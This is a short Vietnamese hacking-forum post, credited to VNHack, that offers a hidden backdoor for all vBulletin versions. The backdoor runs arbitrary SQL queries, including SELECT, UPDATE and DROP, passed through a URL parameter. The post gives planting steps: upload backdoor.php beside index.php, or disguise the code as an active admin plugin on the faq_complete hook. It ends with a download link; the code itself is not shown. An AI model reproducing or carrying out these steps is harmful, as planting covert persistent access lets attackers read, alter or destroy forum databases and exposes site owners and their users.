Skip to main content

Hidden Baby cho vBulletin (all version)

Screenshot:

http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

Share